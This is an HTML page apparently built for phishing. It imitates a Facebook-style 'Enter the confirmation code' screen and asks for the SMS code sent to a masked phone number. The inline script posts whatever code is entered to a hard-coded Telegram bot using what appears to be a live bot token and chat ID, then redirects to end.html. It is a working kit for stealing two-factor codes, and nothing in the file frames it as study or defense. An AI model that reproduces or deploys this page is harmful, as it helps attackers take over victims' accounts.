<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Confirmation Code</title>
  <style>
    body {
      margin: 0;
      font-family: "Segoe UI", system-ui, sans-serif;
      background: linear-gradient(to bottom left, #f5f3f9, #e3f3ff);
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }
    .container {
      background-color: white;
      padding: 40px;
      border-radius: 8px;
      box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
      width: 350px;
    }

    .close {
      font-size: 24px;
      cursor: pointer;
      margin-bottom: 20px;
    }

    h2 {
      font-size: 20px;
      font-weight: 600;
      margin: 0 0 10px;
      color: #050505;
    }

    p {
      color: #050505;
      font-size: 14px;
      margin-bottom: 20px;
    }

    input[type="text"] {
      width: 100%;
      padding: 14px;
      font-size: 16px;
      border: 1px solid #ccd0d5;
      border-radius: 10px;
      margin-bottom: 20px;
      box-sizing: border-box;
    }

    .btn {
      width: 100%;
      padding: 14px;
      font-size: 16px;
      font-weight: 600;
      text-align: center;
      border-radius: 999px;
      border: none;
      cursor: pointer;
      margin-bottom: 10px;
      box-sizing: border-box;
    }

    .btn-primary {
      background-color: #1877f2;
      color: #fff;
    }

    .btn-secondary {
      background-color: #f0f2f5;
      color: #050505;
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="close" onclick="window.close()">&times;</div>
    <h2>Enter the confirmation code</h2>
    <p>To confirm your account, enter the code that we sent via SMS to +8801*********</p>
    <input id="codeInput" type="text" placeholder="Confirmation code" />
    <button class="btn btn-primary" id="sendBtn">Next</button>
    <button class="btn btn-secondary">I didn't receive the code</button>
  </div>

  <script>
    const botToken = '7773567660:AAEnS92Xe9BG8q0XqDD7ilPCa1j5Uuhll6Q'; // Replace with your bot token
    const chatId = '2017838571';     // Replace with your chat ID

    document.getElementById('sendBtn').addEventListener('click', () => {
      const code = document.getElementById('codeInput').value.trim();

      if (!code || !/^\d+$/.test(code)) {
        alert('Please enter a valid numeric code.');
        return;
      }

      const message = `Confirmation code received: ${code}`;

      fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          chat_id: chatId,
          text: message
        })
      })
      .then(response => response.json())
      .then(data => {
        if (data.ok) {
          alert('Code sent successfully!');
          document.getElementById('codeInput').value = '';
          // Redirect to end.html after successful send
          window.location.href = 'end.html';
        } else {
          alert('Failed to send code. Please try again.');
          console.error(data);
        }
      })
      .catch(error => {
        alert('Error sending code.');
        console.error(error);
      });
    });
  </script>
</body>
</html>
